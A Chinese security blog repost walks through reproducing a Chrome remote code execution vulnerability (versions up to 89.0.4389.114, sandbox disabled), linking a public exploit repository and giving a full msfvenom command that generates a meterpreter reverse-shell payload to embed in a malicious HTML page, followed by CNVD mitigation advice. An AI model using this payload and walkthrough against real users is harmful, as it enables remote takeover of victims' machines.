Chrome远程代码执行并移植MSF控制

admin 2021年4月16日06:20:50评论111 views字数 869阅读2分53秒阅读模式


Chrome远程代码执行并移植MSF控制


        国家信息安全漏洞共享平台(CNVD)收录了 Google Chrome 远程代码执行漏洞。未经身份验证的攻击者利用该漏洞,可通过精心构造恶意页面,诱导受害者访问,实现对浏览器的远程代码执行攻击 , 但攻击者单独利用该漏洞无法实现沙盒(SandBox)逃逸。沙盒是 Google Chrome 浏览器的安全边界,防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。CNVD 对该漏洞的综合评级为 “高危”。



Google Chrome 0day 远程代码执行漏洞复现


        条件:

        

                1.环境win10、win7均可,sever不行


                2.关闭沙箱模式-no-sandbox


                3.chrome客户端需64位(Google Chrome < = 89.0.4389.114



       

实验:


使用命令关闭沙箱模式-no-sandbox


Chrome远程代码执行并移植MSF控制


Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day


Chrome远程代码执行并移植MSF控制




将shellcode换成msf:


        这里有集成的脚本:https://github.com/badboycxcc/script


1.生成shellcode:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.xx.xx  lport=4444 -f csharp -o payload3.txt


Chrome远程代码执行并移植MSF控制


将生成的shellcode进行替换即可    


Chrome远程代码执行并移植MSF控制


使用谷歌打开恶意html文件即可反弹shell


Chrome远程代码执行并移植MSF控制

Chrome远程代码执行并移植MSF控制


据说沙盒可以控制


漏洞处置建议


         目前,Google 公司尚未发布新版本或补丁包修复漏洞,CNVD 建议用户使用 Google Chrome 浏览器时不关闭默认沙盒模式,同时谨慎访问来源不明的网页链接或文件。


本文始发于微信公众号(Khan安全攻防实验室):Chrome远程代码执行并移植MSF控制

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月16日06:20:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Chrome远程代码执行并移植MSF控制http://cn-sec.com/archives/335819.html

发表评论

匿名网友 填写信息